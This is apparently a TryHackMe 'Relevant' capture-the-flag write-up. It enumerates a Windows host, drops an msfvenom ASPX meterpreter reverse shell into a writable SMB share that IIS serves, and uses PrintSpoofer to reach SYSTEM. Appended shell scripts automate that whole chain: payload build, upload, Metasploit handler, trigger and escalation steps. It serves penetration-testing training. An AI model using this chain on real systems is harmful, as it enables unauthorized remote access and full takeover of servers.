###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation`

# Relevant

:::info
I have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).

The client has asked that I secure two flags (no location provided) as proof of exploitation:

- User.txt
- Root.txt
:::

## Reconnaissance

### Port enumeration with nmap

A basic nmap scan showed me the open ports. There is a Samba share and a web server running on port **80**.

![](https://i.imgur.com/FJRtLZA.png)

After further enumeration with nmap, I discovered another web server running on port **49663**. The default nmap scan only covers the top 1000 ports, so a high port like this one is only found when the full port range is scanned.

![](https://i.imgur.com/2HK1cXr.png)

### Directory enumeration with gobuster

![](https://i.imgur.com/LRz5qnF.png)

I discovered a hidden directory: **/nt4wrksv**

### Samba share enumeration with smbclient

![](https://i.imgur.com/lyYpfcP.png)

:::success
I discovered that the hidden web directory is also exposed as an SMB share, and I found a `password.txt` file in it.
:::

After more enumeration, it appears that the **password.txt** file is useless for this engagement.

## Gaining a first access

The share is writable anonymously and its contents are served by the web server, so a file dropped in over SMB can then be requested over HTTP and executed server-side. That is the actual weakness here, and I want to use it to launch a reverse shell. To do it:

- I first create a reverse shell with `msfvenom`:

  `msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=IP lport=1234 -f aspx -o shell.aspx`

:::info
A file with the **ASPX** file extension is an Active Server Page Extended file, designed for Microsoft's ASP.NET framework. ASPX files are not static: when the web server (IIS on Windows) receives a request for one, the ASP.NET runtime compiles and runs the server-side code it contains and returns the generated HTML to the browser. This is why placing an ASPX file in a directory the web server serves is enough to run code on the server.
:::

- I put the shell in the hidden directory via the Samba share.

![](https://i.imgur.com/RX7D43e.png)

- Then I create a handler with Metasploit and request the uploaded page on the web server, which makes the payload connect back.

![](https://i.imgur.com/JPW9UIp.png)

:::success
I GAINED A FIRST ACCESS. `user.txt` found!
:::

![](https://i.imgur.com/8FNLyXj.png)

## Privilege escalation

I type the command `getprivs` in meterpreter. This command lists the **privileges** held by the access token of the process meterpreter is running in on the remote machine.

![](https://i.imgur.com/gmqkaXA.png)

We can see that `SeImpersonatePrivilege` is enabled. On Windows, this privilege lets a process impersonate the security context of any client that authenticates to it. Service accounts such as the IIS application pool identity hold it by default, which is why a shell obtained through a web application so often has it. A non-admin user with `SeImpersonatePrivilege` can escalate to `NT AUTHORITY\SYSTEM` with tools like **PrintSpoofer**, available [here](https://github.com/dievus/printspoofer.git): it coerces the Print Spooler service (which runs as SYSTEM) into connecting to a named pipe the tool controls, impersonates the resulting token and spawns a new process with it. The Print Spooler service therefore has to be running on the target for this to work.

To elevate my privileges:

- I download PrintSpoofer from GitHub.
- I put it in the share like I did with the reverse shell.

![](https://i.imgur.com/g6QrZw4.png)

- From meterpreter I search for the shared directory and go into it.

![](https://i.imgur.com/ULs2AdO.png)

- From there I launch the executable.

![](https://i.imgur.com/vyz5XAH.png)

:::success
I HAVE ADMIN PRIVILEGES. `root.txt` found!
:::

![](https://i.imgur.com/2siJZ8h.png)
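The reconnaissance phase above is only shown as screenshots. The following shell script is an added example written for this page (it is not the writeup's own code): it reproduces the full-range port scan, the service scan on the open ports, gobuster against every HTTP service and the anonymous SMB listing, and it parses nmap's grepable output so each step feeds the next. The target address, the wordlist path and the sample `.gnmap` lines used for the self-check are constructed assumptions; the ports in the sample only mirror what the writeup found (Samba, web servers on 80 and 49663).

```shell
# Added example, not part of the original writeup. Requires nmap, gobuster and
# smbclient for the live recon() function; the parsing helpers run offline.

# Parse grepable nmap output (-oG / -oA *.gnmap) on stdin and print
# "port/service" for every open TCP port, one per line. The "Ports:" column
# holds entries of the form port/state/proto/owner/service/rpcinfo/version/
# separated by ", ", and the columns of the line are tab-separated.
open_ports_from_gnmap() {
    awk -F'\t' '
        /^Host:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, entries, ", ")
                    for (j = 1; j <= n; j++) {
                        split(entries[j], f, "/")
                        if (f[2] == "open" && f[3] == "tcp") print f[1] "/" f[5]
                    }
                }
            }
        }'
}

# From the "port/service" list, keep only the port numbers whose service was
# identified as http: these are the candidates for directory brute-forcing.
http_ports() {
    awk -F/ '$2 == "http" { print $1 }'
}

# Constructed sample of a service-scan .gnmap file for a host like this one.
# The values are made up for the self-check; only the set of services mirrors
# what the writeup found.
sample_gnmap() {
    printf 'Host: 10.10.10.10 ()\tStatus: Up\n'
    printf 'Host: 10.10.10.10 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 10.0/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds///, 49663/open/tcp//http//Microsoft IIS httpd 10.0/\tIgnored State: filtered (65531)\n'
}

# Full reconnaissance of one host. The default nmap scan covers only the top
# 1000 ports, which is how a web server on 49663 gets missed; -p- covers all
# 65535. The wordlist path is an assumption.
recon() {
    target="$1"
    wordlist="${WORDLIST:-/usr/share/wordlists/dirb/common.txt}"

    nmap -p- --min-rate 2000 -oA "full-$target" "$target" > /dev/null
    ports=$(open_ports_from_gnmap < "full-$target.gnmap" | cut -d/ -f1 | paste -sd, -)
    [ -n "$ports" ] || { echo "no open TCP ports found on $target" >&2; return 1; }

    # Service/version scan restricted to the open ports, so service names are
    # reliable before deciding which ones are web servers.
    nmap -sC -sV -p "$ports" -oA "services-$target" "$target"

    # Directory brute-force on every HTTP service (this is where /nt4wrksv appears).
    for p in $(open_ports_from_gnmap < "services-$target.gnmap" | http_ports); do
        gobuster dir -u "http://$target:$p/" -w "$wordlist" -o "gobuster-$target-$p.txt"
    done

    # Anonymous SMB: list the shares, then the contents of the one that matches
    # the hidden web directory.
    smbclient -N -L "//$target/"
    smbclient -N "//$target/nt4wrksv" -c 'ls'
}

# Usage: recon 10.10.10.10
```

`open_ports_from_gnmap` is run against the service scan rather than the first full-range scan because, without `-sV`, the service column only contains whatever name nmap has on file for the port number, and an unusual port such as 49663 would simply show up blank.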
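The upload-and-trigger chain from the "Gaining a first access" section, as an added example (not the writeup's own code). `TARGET` and `LHOST` are placeholders; the share name `nt4wrksv`, port 49663 and the payload name come from the writeup, and the assumption that a file put in the share is served under `/nt4wrksv/` on the port 49663 site is what the writeup's result relies on. `msfvenom`, `smbclient`, `msfconsole` and `curl` must be installed for the live functions.

```shell
# Added example, not part of the original writeup. Placeholders are marked.
TARGET="${TARGET:-10.10.10.10}"   # assumed target address
LHOST="${LHOST:-10.8.0.2}"        # assumed attacker address
LPORT="${LPORT:-1234}"            # port used in the writeup's msfvenom command
SHARE="nt4wrksv"                  # writable share, also the hidden web directory
WEB_PORT="49663"                  # second web server found by nmap
PAYLOAD="windows/x64/meterpreter_reverse_tcp"   # stageless, as in the writeup

# Build the ASPX reverse shell. The handler must be set to exactly this payload:
# a staged listener (meterpreter/reverse_tcp) will not complete a stageless
# connect-back, which is a common reason for "session died" right after trigger.
gen_payload() {
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f aspx -o shell.aspx
}

# Drop a local file into the anonymously writable share.
upload_to_share() {
    smbclient -N "//$TARGET/$SHARE" -c "put $1"
}

# URL the uploaded file will be served from, given the share/web-root mapping.
payload_url() {
    echo "http://$TARGET:$WEB_PORT/$SHARE/$1"
}

# Emit a msfconsole resource script for the listener. It is printed rather
# than written so it can be inspected; run it with:
#   handler_rc > handler.rc && msfconsole -q -r handler.rc
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set payload $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Requesting the page is what makes the web server compile and run it, so this
# is the step that actually fires the reverse shell. The request never returns
# normally once the payload is executing, hence the 10 second cap.
trigger() {
    curl -s -o /dev/null -m 10 "$(payload_url "$1")" || true
}

# Order of operations (the listener must be up before the trigger):
#   gen_payload && upload_to_share shell.aspx && handler_rc > handler.rc
#   msfconsole -q -r handler.rc      # in another terminal
#   trigger shell.aspx
```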
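For the privilege escalation section, an added example (not from the writeup or from the PrintSpoofer project): a check that decides from `whoami /priv` output whether `SeImpersonatePrivilege` is actually present and enabled before reaching for PrintSpoofer, the staging of the binary through the same share, and the commands to type in the meterpreter session. `whoami /priv` is the plain-shell equivalent of `getprivs`. The two privilege listings are constructed samples, and the target address and the local binary name are assumptions.

```shell
# Added example, not part of the original writeup. Samples are constructed.
TARGET="${TARGET:-10.10.10.10}"   # assumed target address
SHARE="nt4wrksv"                  # same writable share used for the reverse shell

# Read `whoami /priv` output on stdin and return 0 only if SeImpersonatePrivilege
# is listed AND its State column is Enabled. Output copied from a Windows shell
# usually carries CRLF line endings, which would otherwise turn the last field
# into "Enabled\r" and make the check fail.
has_impersonate_priv() {
    awk '
        { sub(/\r$/, "") }
        $1 == "SeImpersonatePrivilege" { state = $NF }
        END { exit !(state == "Enabled") }'
}

# Constructed sample resembling what an IIS application pool identity reports:
# this is the situation the writeup is in.
sample_privs_iis() {
    cat <<'EOF'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
EOF
}

# Same listing with Windows line endings, as it arrives when pasted from cmd.exe.
sample_privs_iis_crlf() {
    sample_privs_iis | awk '{ printf "%s\r\n", $0 }'
}

# Constructed sample for an ordinary low-privileged user: the privilege is not
# in the token at all, so PrintSpoofer is not an option from this shell.
sample_privs_user() {
    cat <<'EOF'
Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
EOF
}

# Stage the binary through the writable share, exactly like the reverse shell.
# The file is assumed to be saved locally as PrintSpoofer.exe (from the
# repository linked in the writeup).
stage_printspoofer() {
    smbclient -N "//$TARGET/$SHARE" -c "put PrintSpoofer.exe"
}

# Commands to type inside the meterpreter session once the binary is staged.
# The directory is not hard-coded because the writeup locates it with search.
# PrintSpoofer needs the Print Spooler service running on the target;
# "-i -c cmd" spawns an interactive cmd.exe as NT AUTHORITY\SYSTEM.
meterpreter_steps() {
    cat <<'EOF'
search -f PrintSpoofer.exe
cd <directory reported by search>
shell
whoami /priv
PrintSpoofer.exe -i -c cmd
whoami
EOF
}

# Usage: whoami /priv output saved from the target, then:
#   has_impersonate_priv < privs.txt && stage_printspoofer && meterpreter_steps
```

The check is deliberately strict about the State column: a privilege that is present but Disabled can be re-enabled by the process itself, but reporting only Enabled privileges as a green light avoids a false positive when the token does not hold the privilege at all.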